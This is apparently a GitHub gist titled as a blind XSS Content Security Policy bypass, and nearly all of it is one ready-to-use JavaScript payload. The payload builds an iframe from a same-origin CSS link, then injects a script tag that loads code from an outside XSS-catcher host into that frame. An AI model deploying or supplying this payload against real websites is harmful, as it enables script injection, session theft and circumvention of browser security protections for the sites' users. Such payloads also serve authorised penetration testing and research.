Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save JarLob/89165857ac88db59e3f8bf6db98c2563 to your computer and use it in GitHub Desktop.
Save JarLob/89165857ac88db59e3f8bf6db98c2563 to your computer and use it in GitHub Desktop.
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment